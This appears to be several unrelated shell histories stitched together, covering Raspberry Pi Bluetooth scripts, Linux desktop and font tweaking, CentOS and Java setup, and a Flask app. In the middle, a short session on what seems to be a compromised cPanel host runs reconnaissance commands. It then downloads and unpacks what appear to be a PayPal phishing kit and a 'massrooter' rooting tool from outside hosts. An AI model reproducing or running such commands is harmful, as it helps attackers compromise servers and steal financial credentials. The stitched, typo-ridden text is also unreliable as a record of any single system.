luminosidad.py +python luminosidad.py +nano tempsensor.py +nano luminosidad.py +nano uploadInfo.py +python luminosidad.py +python uploadInfo.py +python luminosidad.py +python uploadInfo.py +python luminosidad.py +nano uploadInfo.py +python uploadInfo.py +nano uploadInfo.py +python uploadInfo.py +nano uploadInfo.py +python uploadInfo.py +nano uploadInfo.py +python uploadInfo.py +nano tempsensor.py +nano uploadInfo.py +touch readInfo.py +nano readInfo.py +python readInfo.py +nano readInfo.py +python readInfo.py +nano readInfo.py +sudo shutdown now +ls +nano uploadInfo.py +sudo apt-get update +sudo apt-get upgrade +sudo apt-get install bluetooth blueman bluez +sudo reboot +sudo apt-get install python-bluetooth +sudo apt-get install python-rpi.gpio +sudo bluetoothctl +exit +sudo bluetoothctl +sudo reboot +ls +python luminosidad.py +sudo shutdown now +python luminosidad.py +sudo shutdown now +ls +python luminosidad.py +ls +python tempsensor.py +python luminosidad.py +nano luminosidad.py +python luminosidad.py +nano luminosidad.py +python luminosidad.py +sudo reboot +python luminosidad.py +sudo shutdown now +python luminosidad.py +sudo shutdown now +python luminosidad.py +sudo shutdown now +python luminosidad.py +gpio -v +gpio readall +python luminosidad.py +nano lum`py +nano lum.py +python lum.py +python luminosidad.py +sudo shutdown now +python luminosidad.py +sudo shutdown now +nano luminosidad.py +python luminosidad.py +sudo bluetoothctl +nano /etc/bluetooth/main.conf +sudo bluetoothctl +sudo apt-get install python3-pip libglib2.0-dev +sudo pip install bluepy +sudo hcitool lescan +python btle.py 1E:D9:3E:C9:07:17 +ls +ls +ls +ls +ls +python btle.py 1E:D9:3E:C9:07:17 +hiconfig -a +python btle.py B8:27:EB:5D:F8:54 +sudo bluetoothctl +python btle.py B8:27:EB:5D:F8:54 +apt-get install build-essential libdbus-1-dev +git clone +git checkout 7d2864686f8b3daad021ea042adc322276e75045 . +git checkout 7d2864686f8b3daad021ea042adc322276e75045 +make +hciconfig hci0 down +sudo hciconfig hci0 down +sudo hciconfig hci0 up +python btle.py xx:xx:xx:xx:xx:xx random +python btle.py xx:xx:xx:xx:xx:xx random +python btle.py +nano ble_test.py +python ble_test.py +nano ble_test.py +python ble_test.py +ls +nano readInfo.py +nano ble_test.py +sudo bluetoothctl +nano serverble.py +python serverble.py +nano serverble.py +sudo bluetoothctl +hciconfig +ls +nano serverble.py +python serverble.py +nano serverble.py +nano server2 +python server2.py +nano clienbluetooth.py +python clienbluetooth.py +nano clienbluetooth.py +python clienbluetooth.py +sudo bluetoothctl +nano serverbotonbluetooth.py +rm server2.py +rm serverble.py +python serverbotonbluetooth.py +sudo nano /etc/rc.local +sudo reboot +python clienbluetooth.py +ps -e +ps R +ps --help +nano clienbluetooth.py +nano uploadInfo.py +python clienbluetooth.py +nano clienbluetooth.py +python clienbluetooth.py +nano clienbluetooth.py +python clienbluetooth.py +sudo nano /etc/rc.local +python clienbluetooth.py +ps -e +ls +nano starttime.txt +nano uploadData +sudo nano /etc/rc.local +python clienbluetooth.py +sudo rebbot +sudo reboot +ls +cat starttime.txt +nano uploadData +python clienbluetooth.py +sudo shutdown now +python clienbluetooth.py +ls +nano readInfo.py +nano valpul +ls +nano clienbluetooth.py +nano uploadInfo.py +nano serverbotonbluetooth.py +nano uploadInfo.py +nano serverbotonbluetooth.py +nano uploadInfo.py +nano serverbotonbluetooth.py +nano uploadInfo.py +nano serverbotonbluetooth.py +python serverbotonbluetooth.py +nano serverbotonbluetooth.py +python serverbotonbluetooth.py +sudo reboot +python serverbotonbluetooth.py +nano serverbotonbluetooth.py +python serverbotonbluetooth.p +python serverbotonbluetooth.py +nano serverbotonbluetooth.py +python serverbotonbluetooth.py +nano serverbotonbluetooth.py +python serverbotonbluetooth.py +nano serverbotonbluetooth.py +python serverbotonbluetooth.py +nano uploadInfo.py +python serverbotonbluetooth.py +nano serverbotonbluetooth.py +ls +nano uploadData +python serverbotonbluetooth.py +python serverbotonbluetooth.py +python uploadInfo.py +python serverbotonbluetooth.py +python uploadInfo.py +nano readInfo.py +nano uploadInfo.py +python serverbotonbluetooth.py +nano serverbotonbluetooth.py +python serverbotonbluetooth.py +nano uploadInfo.py +python serverbotonbluetooth.py +ls +nano readInfo.py +nano clienbluetooth.py +nano clienbluetooth2.py +nano clienbluetooth.py +nano clienbluetooth2.py +nano readInfo.py +nano uploadInfo.py +nano readInfo.py +nano uploadInfo.py +nano readInfo.py +python readInfo.py +python readInfo.py +ls +python clienbluetooth.py +python readInfo.py +python clienbluetooth.py +python readInfo.py +python clienbluetooth2.py +python readInfo.py +python clienbluetooth2.py +python clienbluetooth1.py +python clienbluetooth.py +python clienbluetooth2.py +python clienbluetooth.py + +ls +nano luminosidad.py +nano lum.py +nano luminosidad.py +python clienbluetooth.py +python clienbluetooth2.py +python readInfo.py +nano readInfo.py +python readInfo.py +nano readInfo.py +python readInfo.py +nano readInfo.py +python readInfo.py +nano readInfo.py +python readInfo.py +nano readInfo.py +python readInfo.py +nano readInfo.py +ls +nano valpul +nano serverbotonbluetooth.py +python clienbluetooth2.py +sudo crontab -e +python clienbluetooth2.py +nano luminosidad.py +python clienbluetooth2.py +python clienbluetooth.py +python clienbluetooth2.py +python clienbluetooth.py +python clienbluetooth2.py +python clienbluetooth.py +python clienbluetooth2.py +TypeError: bufsize must be an integer +python serverbotonbluetooth.py +python clienbluetooth.py +python clienbluetooth2.py +python clienbluetooth.py +python clienbluetooth2.py +python clienbluetooth.py +python clienbluetooth2.py +python clienbluetooth1.py +python clienbluetooth.py +python clienbluetooth2.py +python clienbluetooth.py +python clienbluetooth2.py +python clienbluetooth.py +python clienbluetooth2.py +python clienbluetooth.py +nano clienbluetooth2.py +nano clienbluetooth.py +python clienbluetooth.py +python clienbluetooth2.py +ls +nano valpul +nano pulsador.py +python pulsador.py & +nano clienbluetooth3.py +nano clienbluetooth.py +nano clienbluetooth3.py +nano pulsador.py +kill 10839 +python pulsador.py & +sudo crontab -e +ls +nano serverbotonbluetooth.py +sudo crontab -e +python serverbotonbluetooth.py & +sudo reboot +sudo crontab -e +sudo reboot +pytn readInfo.py +python readInfo.py +sudo shutdown now +ls +nano clienbluetooth.py +python datosSensores.py +nano datosSensores.py +nono readInfo.py +nano readInfo.py +nono readInfo.py +nano readInfo.py +python readInfo.py +sudo crontab -e +ps -e +sudo reboot +ps -e +nano serverbotonbluetooth.py +ls +sudo crontab -e +python readInfo.py +sdo reboot +sudo reboot +sudo crontab -e +ls +sudo crontab -e +ls +nano datosSensores.py +nano ldr +nano led.py +python led.py +nano led.py +python led.py +ano led.py +nano led.py +python led.py +nano led.py +nano ledoff.py +ls +nano serverbotonbluetooth.py +sudo reboot +nano serverbotonbluetooth.py +python led.py +python ledoff.py +nano serverbotonbluetooth.py +sudo reboot +nano serverbotonbluetooth.py +ls +pwd +nano serverbotonbluetooth.py +sudo reboot +crontab -e +sudo crontab -e +ls +nano datosSensores.py +sudo crontab -e +nano datosSensores.py +sudo crontab -e +sudo reboot +cpanel +pwd +id +ls +su +su +ls +ls +mkdir public_html +quit +exit +uname -a +ls -a +ps x +ls -a +wget +;s =a +ls -a +wget free-ftp.org/patra/paypal.zip +unzip paypal.zip +unzip paypal.zip +gzip -d paypal.zip +gunzip -d paypal.zip +ls -a +ls -a +rm -rf paypal.zip +ls -a +cat /proc/ +cat /proc/cpuinfo +wget zlaty.xhost.ro/massrooter.tgz +tar xzvf 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+ll +ll +cv +si3 +si3 +dm-tool lock +dm-tool lock +si3 +sudo vim /etc/lightdm/lightdm-mini-greeter.conf +~/Pictures/ +si3 +./standard-notes-3.0.14-x86_64.AppImage & +info -f grub -n 'Simple configuration' +sudo info -f grub -n 'Simple configuation' +man grub +cv +./standard-notes-3.0.14-x86_64.AppImage & +ll +ls -al +cat grubenv +cat grub.cfg +ll +ll +cat grub +vim grub +cv +sudo -H vim /etc/default/grub +./pia-linux-1.1-02537.run +ll +ll | grep 'QR' +feh QR.png +ll | grep 'QR' +./standard-notes-3.0.14-x86_64.AppImage & +sudo apt-get install qrencode +man qrencode +echos/QR.png +echos/QR.png +echos/QR.png +echos/QR.png +echos=20 -d 300 -o ~/Pictures/QR.png +echos=10 -d 300 -o ~/Pictures/QR.png +echos=4 -d 300 -o ~/Pictures/QR.png +echos=20 -d 300 -o ~/Pictures/QR.png +echosize=20 -d 300 -o ~/Pictures/QR.png +echosize=20 -d 300 -o ~/Pictures/QR.png +echosize=20 -d 300 -o ~/Pictures/QR.png +echosize=20 -d 300 -o ~/Pictures/QR.png +echosize=20 -d 300 -o ~/Pictures/QR.png +echosize=20 -d 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~/Pictures/ +cv +ls -alh /opt/piavpn/ +ls -alh /opt/ +ls -alh +ll +ll +cat vimrc +less vimrc +ls -al +ll +cat vimrc.tiny +cv +cv +neofetch +vim .config/neofetch/ +ll +sudo vim config +cv +cv +neofetch +cv +neofetch +sudo vim config +cv +neofetch +sudo vim config +cv +neofetch +ll +vim 20190608.txt +ll +vim 20190608.txt +si3 +vim 20190608.txt +c +ll +cat vimrc +ll +ll +vim lightline.vim +vim .vimrc +cv +vim +man xcape +xcape --help +sudo apt-get install xcape +man xcape +man xmodmap +ll +vim .Xdefaults +vim -o .Xdefaults .Xresources +man urxvt +ll +cat .Xauthority +cat .xessionrc +vim .xsessionrc +ll +ll +ll +ll +ll +ll +ll +ll +ll +ll +ll +ll +ll +ll +ll +ll +vimm xorg.xml +vim xorg.xml +cv +ll +ll +ll +ll +ll +ll +ls -al +ll +ll +ll +vim userChrome.css +ln -s ~/.mozilla/firefox/0td9tpij.default/chrome/userChrome.css ~/.userChrome.css +ll +ll +ll +vim config +vim .Xresources +vim .bash_aliases +cruft --help +sudo cruft --help +sudo cruft -r +sudo cruft -N -r +cv +dpkg --search /srv/cvs +sudo cruft -d / -r report --ignore /home --ignore /var --ignore /tmp +less report +vim report +mv report ~/Documents/ +ll +cat message.txt +cat STD.txt +cat userchrome.css +cv +find / -name "dotfiles" +ll +ll +vim i3config +cp .vimrc ~/Documents/.dotfiles/vim +mv vim .vimrc +ll +mkdir vim +mv .vimrc vim +ll +ll +git add .vimrc +git status +git commit +git status +git reset +git status +git add vim/ +git reset +ls -alhC +cat vimrc +cat .vimrc +sudo vim .vimrc +cp .vimrc /etc/vim/vimrc.local +sudo cp .vimrc /etc/vim/vimrc.local +cv +cp .vimrc ~/Documents/.dotfiles/vim/ +ll +ll +cat plug.vim +cv +ll +cat .netrwhist +cp autoload plugged spell ~/Documents/.dotfiles/vim/ +cp -r autoload plugged spell ~/Documents/.dotfiles/vim/ +ll +ll +cat vimrc_about.txt +rm vimrc_about.txt +cat vimrc +rm vimrc +ll +mv .vimrc .vim/ +ll +cat .viminfo +cv +cp -r .vim ~/Documents/.dotfiles/ +ll +ll +ls -al +sudo rm -r vim/ +cv +ll +mv .vimrc vimrc +ll +vim vimrc +cp .vim ~/Documents/.dotfiles/.vim +cp -r .vim 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-alC +ls -alx +ls -alf +ls -al +ll +la +la +cat Androids\ in\ the\ Mirror.docx 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zsh +man zsh +v +vim +c +cv +ll +mv \#Music/ \#Animal\ Politik +ll +ll +mv Manifesto/ Writing/ +cv +ll +ll +vim +python3 Documents/coding/prophecy_game.py +cv +python3 Documents/coding/prophecy_game.py +python3 testtype.py +cv +python3 testtype.py +touch testtype.py +vim testtype.py +python3 Documents/coding/prophecy_game.py +cv +python3 Documents/coding/prophecy_game.py +cv +python3 Documents/coding/prophecy_game.py +python3 +vim +python3 Documents/coding/prophecy_game.py +cv +python3 Documents/coding/prophecy_game.py +vim .vim/vimrc +exec urxvt --name test +vim .Xresources +xrdb -merge .Xresources +xprop +thunderbird +cv +python3 Documents/coding/prophecy_game.py +sdf +cv +ll +python3 Documents/coding/prophecy_game.py +python3 prophecy_game.py +cv +si3 +vim .bashrc +xrdb ~/.Xresources +cv +vim Documents/coding/prophecy_game.py +vim prophecy_game.py +python3 Documents/coding/prophecy_game.py +youtube-dl --help +ls +mkdir Yoink +touch list.txt +vim list.txt +youtube-dl -a list.txt +ll +vlc THE\ LAST\ DAYS\ OF\ DREAMS\ \'On\ The\ Monitor\'-gyXUufMBAz0.mp4 +mv THE\ LAST\ DAYS\ OF\ DREAMS\ \'On\ The\ Monitor\'-gyXUufMBAz0.mp4 LDOD_Scottys_On_the_Monitor.mp4 +ll +vlc The\ Last\ Days\ Of\ Dreams cv +cv +vim list.txt +youtube-dl -x -a list.txt +ll +vlc THE\ LAST\ DAYS\ OF\ DREAMS\ \'On\ The\ Monitor\'-gyXUufMBAz0.m4a +ll +sudo +su +si3 +ll +ls -l +vim prophecy_p +ls -l +rm prophecy_p +ll +vim prophecy_game.py +ll +vim userChrome.css +python3 prophecy_game.py +si3 +cp .mozilla/firefox/0td9tpij.default/chrome/userChrome.css ~/Documents/.dotfiles/ +mkdir firefox +mv userChrome.css firefox/ +ll +git add bash firefox i3 rofi .vim .Xresources compton README.md .themes wallpaper +git status +git commit -m"updated dots" +git push +cv +cv +sudo apt-get install pywal +cv +python3 ~/Documents/coding/prophecy_game.py +vim Documents/coding/prophecy_game.py +./pia-linux-1.1-02537.run +xprop +vim +cv +vim userContent.css +vim userChrome.css +ll +unzip snes9x-1.53-x64.zip +sudo apt-get install wine +wine +sudo apt-get install wine32 +sudo dpkg --add-architecture i386 && apt-get update && apt-get install wine32 +su +sudo apt-get install higan +higan +man higan +ll +unzip ePSXe205linux_x64.zip +ll +ll +epsxe_64 +wine psxe_64 +vim .vim/vimrc +xrdb -merge .Xresources +ll +ls -al +l +la +vim 06.30.2019.txt +vim .vim/vimrc +vim Dropbox/#Writing/#2019/06.30.19.txt +vim Dropbox/#Writing/#2019/ +vim Dropbox/#Writing/#2019/06.30.2019.txt +ll +la +vim .bashrc +ll +sdfsf +cv +sdfsdff +ll +sdfdsdfsdf +sdfsdfsdfsd +ls +ll +printf '\e]710;%s\007' "xft:Terminus:pixelsize=12" +printf '\e]710;%s\007' "xft:fira-code:pixelsize=12" +printf '\e]710;%s\007' "xft:fira-code:medium:pixelsize=12" +printf '\e]710;%s\007' "xft:firacode:medium:pixelsize=12" +printf '\e]710;%s\007' "xft:firacode:bold:pixelsize=12" +printf '\e]710;%s\007' "xft:sourcecodepro:semibold:pixelsize=12" +printf '\e]710;%s\007' "xft:sourcecodepro:bold:pixelsize=12" +printf '\e]710;%s\007' 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"xft:Source Code Pro Semibold:pixelsize=11" +ll +ll +zsh +man xterm +xterm +fc-list +fc-list | grep "iosevka" +fc-list | grep "Iosevka" +fc-list --v +fc-list -v +fc-list -v | grep "Iosevka" +fc-list -v | grep "style" +fc-list -v | grep "Iosevka" "style" +fc-list -v | grep 'Iosevka\|style\' +fc-list -v | grep 'Iosevka\|style' +fc-list -v | grep 'iosevka\|Iosevka' +ll +si3 +unzip iosevka-ss01-2.2.1.zip +mv iosevka-ss01-regular.charmap ~/.fonts/ +sudo fc-cache +vim .Xresources +xrdb -merge .Xresources +vim .Xresources +xrdb -merge .Xresources +vim .Xresources +xrdb -merge .Xresources +vim .Xresources +xrdb -merge .Xresources +vim .Xresources +xrdb -merge .Xresources +vim .Xresources +xrdb -merge .Xresources +vim .Xresources +xrdb -merge .Xresources +vim .Xresources +xrdb -merge .Xresources +urxvt -fn 'xft:Iosevka SS01:size=11' +urxvt -fn 'xft:Iosevka SS01 Medium:size=10' +urxvt -fn 'xft:Iosevka SS01 Medium:size=11' +urxvt -fn 'xft:Iosevka SS01 Bold:size=11' +urxvt -fn 'xft:Iosevka SS01 Semibold:size=11' +urxvt -fn 'xft:Iosevka SS01 Light:size=11' +urxvt -fn 'xft:Iosevka SS01 Light:size=10' +urxvt -fn 'xft:Iosevka SS01:size=10' +urxvt -fn 'xft:Iosevka SS01 Semibold:size=10' +urxvt -fn 'xft:Iosevka SS01 Heavy:size=10' +urxvt -fn 'xft:Iosevka SS01 Heavy:size=11' +vim .Xresources +xrdb -merge .Xresources +ll +xrdb -merge ~/.Xresources +fc-list | grep 'Iosevka\|name' +fc-list | grep 'Iosevka\|style' +ls -al | grep "Iosevka" +ls -al | grep 'Iosevka' +fc-list | grep 'Iosevka\|style' +fc-list | grep 'Iosevka\|name' +ll +cp Iosevka\ SS01/ ~/.fonts +ll +cp Iosevka\ SS01/ ~/.fonts +cp -r Iosevka\ SS01/ ~/.fonts +cv +ll +fn "xft:Iosevka SS01:size=11" +urxvt -fn "xft:Iosevka SS01:size=11" +vim .Xresources +xrdb -merge ~/.Xresources +ll +ll +ls -al +cat x11-common +xrdb -load ~/.Xresources +xrdb -load +xrdb -load .Xresources +vimtutor +vim .Xresources +xrdb -load .Xresources +xrdb -merge .Xresources +vim +./standard-notes-3.0.14-x86_64.AppImage & +si3 +vim .mozilla/firefox/0td9tpij.default/chrome/userChrome.css +./pia-linux-1.1-02537.run +ranger +lsblk +dev +ll +vim +vim Dropbox/#Writing/#2019/ +ll +ls +ls -al +vim 06.30.2019.txt +cv +ls -al +ll +ls -C +ll +cv +ll +ll +cat colors +ll +cv +ll +vim config.json +vim preferences +vim Preferences +;; +ll +ll +ll +ll +ll +vim +q +vim +urxvt --no-startup-id +apropos urxvt +urxvt-digital-clock +urxvt -digital-clock +find / -name "bitocra" +./pia-linux-1.1-02537.run +si3 +pkill thunar +pkill Thunar +ll +ll +ls +ll +apropos youtube-del +apropos youtube-dl +youtube-dl -help +/playlist +man youtube-dl +youtube-dl --yes-playlistst=PLhMnuBfGeCDNgVzLPxF9o5UNKG1b-LFY9 +ll +youtube-dl --yes-playlistst?list=PLhMnuBfGeCDNgVzLPxF9o5UNKG1b-LFY9 +ll +youtube-dl -i PLhMnuBfGeCDNgVzLPxF9o5UNKG1b-LFY9 +cv +youtube-dl -ist=PLhMnuBfGeCDNgVzLPxF9o5UNKG1b-LFY9&index=21 +cv +la +la +vim list.txt +la +rm list.txt +cv +pwd +cat .Xresources +cv +l +la +rm -r SNES/ +sudo rm -r SNES/ +cv +vim +vim .Xresources +xrdb -merge .Xresources +la +vim .Xdefaults +vim .Xresources +xrdb -merge .Xresources +vim .Xresources +xrdb -merge .Xresources +vim .Xresources +xrdb -merge .Xresources +fc-list +fc-list | grep "Iosevka" +fc-list | grep -i "Iosevka" +vim .Xresources +xrdb -merge .Xresources +vim .Xresources +xrdb -merge .Xresources +vim .Xresources +xrdb -merge .Xresources +vim .Xresources +xrdb -merge .Xresources +vim .Xresources +xrdb -merge .Xresources +vim .Xresources +xrdb -merge .Xresources +vim .Xresources +xrdb -merge .Xresources +vim .Xresources +xrdb -merge .Xresources +vim .Xresources +xrdb -merge .Xresources +vim .Xresources +xrdb -merge .Xresources +vim .Xresources +xrdb -merge .Xresources +vim .Xresources +xrdb -merge .Xresources +la +vim .Xresources +xrdb -merge .Xresources +la +ll +xfontsel +fc-match "Iosevka" +fc-match "Ioveska" +fc-list | grep "Iosevka" +./standard-notes-3.0.15-x86_64.AppImage +ll +la +git add .Xresources +git commit .Xresources -m"Fixed fonts" +git puSH +git push +vim .Xresources +xrdb -merge .Xresources +la +vim .Xresources +cv +xrdb -merge .Xresources +vim .mozilla/firefox/0td9tpij.default/chrome/userChrome.css +ll +ls -al +rm .userChrome.css.swo .userChrome.css.swp +ls -al +l +cat userContent.css +vim userContent.css +vim userChrome.css +ls ~/ +mv ~/pink_black_userChrome.css ~/.mozilla/firefox/0td9tpij.default/chrome/ +ls -al +cat TabBar.txt +vim userChrome.css +cv +ls +vim userContent.css +ls -al +mkdir Other_Styles +mv pink_black_userChrome.css pink_black_userContent.css TabBar.txt Other_Styles/ +ls -al +vim newtab.uc.js +vim tabclick.uc.js +vim userChrome.xml +vim userChrome.css +vim Blur.png +vim prefs.js +vim userChrome.css +vim userContent.css +vim userChrome.css +la +ll +la +cv +la +vim userChrome. +la +vim userChrome.css +vim .vim/vimrc +cp .Xresources ~/Documents/.dotfiles/ +vim .Xresources +vim .vim/vimrc +si3 +ranger +vim +vim .vim/vimrc +cv +./flashcards.sh +vim flashcards.csv +./flashcards.sh +cv +ll +ranger +ranger +la +ll | grep dir +man grep +cv +mkdir Scripts +vim .flashcard +ls +vim flashcards.sh +vim flashcards.csv +chmod a+x flashcards.sh +./flashcards.sh +cv +vim flashcards.csv +vim ~/.vim/vimrc +vim flashcards.csv +./standard-notes-3.0.15-x86_64.AppImage && +redshift & +./standard-notes-3.0.15-x86_64.AppImage & +disown +pkill redshift +sudo get install vim-gtk +sudo apt install vim-gtk +vim +vim .vim/vimrc +vim +vim .Xresources +xrdb -merge .Xresources +si3 +si3 +sudo apt install redshift +redshift & +man redshift +redshit -m list +redshift -m list +redshit & +redshift & +man redshift +cv +redshift +vim +ranger +./standard-notes-3.0.15-x86_64.AppImage +disown +./standard-notes-3.0.15-x86_64.AppImage disown +si3 +vim .mozilla/firefox/0td9tpij.default/chrome/ +ll +mv 89dtkunfrna31.png SpiralParticle.png +si3 +ll +ll +ll +ll +ll +ll +fc-list | grep "Source" +ll +ll +vim .Xdefaults +xrdb -merge .Xresources +ll +xrdb -merge .Xresources +ll +xrdb -merge .Xresources +ll +xrdb -merge .Xresources +ll +xrdb -merge .Xresources +ll +xrdb -merge .Xresources +ll +xrdb -merge .Xresources +ll +xrdb -merge .Xresources +ll +xrdb -merge .Xresources +ll +xrdb -merge .Xresources +fc-list +fc-list | grep "bdf" +fc-list | grep "gotham" +fc-list | grep "Gotham" +xrdb -merge .Xresources +ll +si3 +ll +xrdb -merge .Xresources +ll +xrdb -merge .Xresources +ll +xrdb -merge .Xresources +ll +xrdb -merge .Xresources +ll +xrdb -merge .Xresources +ll +xrdb -merge .Xresources +ll +xrdb -merge .Xresources +ll +xrdb -merge .Xresources +ll +xrdb -merge .Xresources +ll +xrdb -merge .Xresources +ll +xrdb -merge .Xresources +ll +xrdb -merge .Xresources +ll +xrdb -merge .Xresources +ll +xrdb -merge .Xresources +ll +xrdb -merge .Xresources +cv +ll +xrdb -merge .Xresources +ll +xrdb -merge .Xresources +ll +xrdb -merge .Xresources +ll +xrdb -merge .Xresources +ll +fc-list +fc-list | grep "source" +fc-list | grep "Source" +fc-list | grep "Gotham" +fc-list | grep "Source" +fc-list | grep "Fira" +fc-list | grep "Gotham" +vim .Xresources +xrdb -merge .Xresources +vim .Xresources +xrdb -merge .Xresources +vim .Xresources +xrdb -merge .Xresources +vim .Xresources +xrdb -merge .Xresources +vim .Xresources +xrdb -merge .Xresources +vim .Xresources +xrdb -merge .Xresources +vim .Xresources +xrdb -merge .Xresources +vim .Xresources +xrdb -merge .Xresources +vim .Xresources +xrdb -merge .Xresources +vim .Xresources +xrdb -merge .Xresources +vim .Xresources +xrdb -merge .Xresources +vim .Xdefaults +xrdb -merge .Xresources +vim .Xdefaults +vim .mozilla/firefox/0td9tpij.default/chrome/userChrome.css +ll +ls -al +ll +ll +ls +fc-list | grep "Source" +xrdb -merge .Xresources +unzip silom.zip +ll +mv SilomBol.ttf ~/.fonts/ +unzip code_7x5.zip pixelmaster.zip pixeleris.zip yapix.zip +ls -al +mv Code\ 7x5.ttf Pixeleris.ttf PixelMaster.ttf ~/.fonts +xrdb -merge .Xresources +xrdb -merge .Xresources +ll +xrdb -merge .Xresources +ll +xrdb -merge .Xresources +ll +xrdb -merge .Xresources +ll +xrdb -merge .Xresources +ll +urxvt -fn 'xft:Source Code Pro' +urxvt -fn 'xft:Source Code Pro:antialiasing=false' +ll +xrdb -merge .Xresources +ll +man urxvt +xrdb -merge .Xresources +ll +urxvt -fn 'xft:Source Code Pro' +xrdb -merge .Xresources +ll +urxvt -fn 'xft:Source Code Pro' +xrdb -merge .Xresources +la +fc-list | grep "ProFont" +urxvt -fn 'xft:Source Code Pro' +vim .Xresources +ll +dpkg-reconfigure fontconfig-config +sudo +sudo dpkg-reconfigure fontconfig-config +ll +vim fonts.conf +./standard-notes-3.0.15-x86_64.AppImage & +vim +./standard-notes-3.0.15-x86_64.AppImage & +yum install ftp +ftp +yum install ftp + vi /etc/sysconfig/network-scripts/ifcfg-eno16777736 +firewalls-cmd +firewall-cmd --get-default-zone +firewall-cmd --list-all +firewall-cmd --get-zones +sudo firewall-cmd --set-default-zone=public +firewall-cmd --set-default-zone=public +firewall-cmd --get-default-zone +vi /etc/hostname +hostname +vi /etc/hostname +history +yum install bind bind-utils -y +yum install bind bind-utils -y +ped +pwd +vi /etc/named.conf +clear +yum install bind bind-utils -y +pwd +su root +ls +vi /etc/sysconfig/network-scripts/ifcfg-eno16777736 +su root +echo "hello" +echo "hi" +echo "hello world" > tmp.txt +nano tmp.txt +yum install nano +cat tmp.txt +echo "hi" > tmp.txt +cat tmp.txt +nano tmp.txt +which bash +vim helloworld.sh +yum install vim +vi helloworld.sh +ip address +yum install git +chown -R a+x /etc/yum.conf +chmod -R a+x /etc/yum.conf +chmod -R 777 /etc/yum.conf +chmod -R 777 /etc/yum.conf +sudo chmod -R ugo+rw /etc/yum.conf +chmod -R ugo+rw /etc/yum.conf +sudo chmod -R ugo+rw /etc/yum.conf +su +sudo apt-get update +javac -version +sudo apt install jd +sudo apt install oracle-java9-installer +sudo apt-get install oracle-java9-installer +wget +java -version +sudo apt-get update +wget +rpm -qa wget +apt install rpm +wget +ls +apt update +java -version +wget +ls -lh +ls +mv jdk-10.0.2_linux-x64_bin.tar.gz?AuthParam=1534229053_a006abd533ea02b782a0d2cb84b233b0 +mv jdk-10.0.2_linux-x64_bin.tar.gz?AuthParam=1534229053_a006abd533ea02b782a0d2cb84b233b0 jdk-10.0.2_linux-x64_bin.tar.gz?AuthParam=1534229053_a006abd533ea02b782a0d2cb84b233b0 +mv jdk-10.0.2_linux-x64_bin.tar.gz?AuthParam=1534229053_a006abd533ea02b782a0d2cb84b233b0 jdk-10.0.2_linux-x64_bin.tar.gz +ls +tar -xvf jdk-10.0.2_linux-x64_bin.tar.gz +ls +mv apache-maven-3.5.4 /opt/ +ls +echo $PAPATH +echo $PATH +ls +ls -la +vi .profile +source .profile +vi .profile +pwd +vi .profile +echo $PATH +maven -version +/opt/apache-maven-3.5.4 +maven --version +ls +rm jdk-10.0.2_linux-x64_bin.tar.gz +ls +ls -lh +mv jdk-10.0.2_linux-x64_bin.tar.gz?AuthParam=1534229053_a006abd533ea02b782a0d2cb84b233b0 jdk-10.0.2_linux-x64_bin.tar.gz +ls java -version +wget +ls -lh +rm jdk-10.0.2_linux-x64_bin.tar.gz?AuthParam=1534229730_2762da20cab0933c572754721f9f5079 +ls +rm jdk-10.0.2_linux-x64_bin.tar.gz?AuthParam=1534231049_252e0b7eeb2049981663aa63fd17f99f +ls +rm jdk-10.0.2_linux-x64_bin.tar.gz?AuthParam=1534344027_5ee949ea0840fb044cfbd7ca1dd954b3 +ls +mv jdk-10.0.2 /opt/ +ls +ls +echo $PATH +ls +ls -la +vi .profiel +vi .profile +pwd +vi .profile +sourse .profile +source .profile +echo $PATH +java -version +wgets.apache.org/dist/maven/maven-3/3.5.4/binaries/apache-maven-3.5.4-bin.tar.gz +ls -lh +tar -xvf apache-maven-3.5.4-bin.tar.gz +mv apache-maven-3.5.4-bin.tar.gz /opt/ +ls +pip +pip install flask +pwd +mkdir web +mkdir templates +ll +ls -lrt +vi student.html +vi result.html +vi app.py +python app.py +pip install os +pip freeze +python +which python +/cygdrive/c/Python27/python +which bash +echo $PATH +python -v +python -m pip install --upgrade pip setuptools wheel +vi mainapp.py +python mainapp.py +pip install numpy +pip install pandas +python mainapp.py +ll +ls +pwd +mv app.py mainapp.py templates/ web/ +ls -lrt +vi student.html +cp /cygdrive/c/Users/mayour/Downloads/pari\ work/ +cp /cygdrive/c/Users/mayour/Downloads/pari\ work/WA_Fn-UseC_-IT-Help-Desk.xlsx . +ls- lrt +ls -lrt +vi mainapp.py +python mainapp.py +pip install xlrd +python mainapp.py +cat app.py +vi mainapp.py +vi mainapp.py +python mainapp.py +vi mainapp.py +python mainapp.py +vi mainapp.py +python mainapp.py +vi mainapp.py +python mainapp.py +ll +l +ls +ls -lrt +vi mainapp.py +ps +python app.py +ll +ls -lrt +ls -lrt +cat ../app.py +python app.py +mv * ../ +ll +ls +ls +ls -lrt +rm web/ +rm -r web/ +python app.py +python mainapp.py +vi mainapp.py +python mainapp.py +ls +ls -lrt +ls -lrt +vi mainapp.py +ps +ps -ef +python mainapp.py +vi mainapp.py +vi student.html +vi mainapp.py +vi mainapp.py +python mainapp.py +vi mainapp.py +python mainapp.py +vi mainapp.py +python mainapp.py +ll +ls +ls -lrt +vi mainapp.py +python mainapp.py +vi mainapp.py +python mainapp.py +vi mainapp.py +python mainapp.py +vi mainapp.py +python mainapp.py +vi mainapp.py +vi mainapp.py +python mainapp.py +ls templates/ +vi mainapp.py +python mainapp.py +vi mainapp.py +python mainapp.py +vi mainapp.py +python mainapp.py +ls templates/ +vi login.html +ls -lrt +vi test.py +python te +python test.py +python test.py +vi test.py +ps -ef +python test.py +ll +ls -lrt +cat templates/login.html +exit +ls -lrt +python test.py +ps -ef +vi mainapp.py +python mainapp.py +vi mainapp.py +python mainapp.py +vi mainapp.py +python mainapp.py +vi mainapp.py +python mainapp.py +vi mainapp.py +python mainapp.py +exit +sudo ps -ef +ps -ef +netstat +lsof -i +netstat -tulpn +ls -lrt +cat te +cat test.py +vi test.py +python test.py +cat templates/login.html +vi templates/login.html +python test.py +ps -ef +ll +ls +vi app.py +vi app.py +python app.py +vi app.py +cat templates/result.html +ps -ef +ps -aux +ps aux +python app.py & +ps -ef +vi app.py +vi templates/result.html +vi templates/student.html +vi templates/student.html +vi templates/student.html +vi app.py +ps -ef +kill -9 2712 +ps -ef +vi mainapp.py +python mainapp.py +cat mainapp.py +cat app.py +vi mainapp.py +python mainapp.py +cat mainapp.py +cat app.py +vi mainapp.py +python mainapp.py +vi mainapp.py +python mainapp.py +vi mainapp.py +vi sample.html +vi mainapp.py +vi sample.htnl +git close +git --hel +git --help +ls +ls +ls 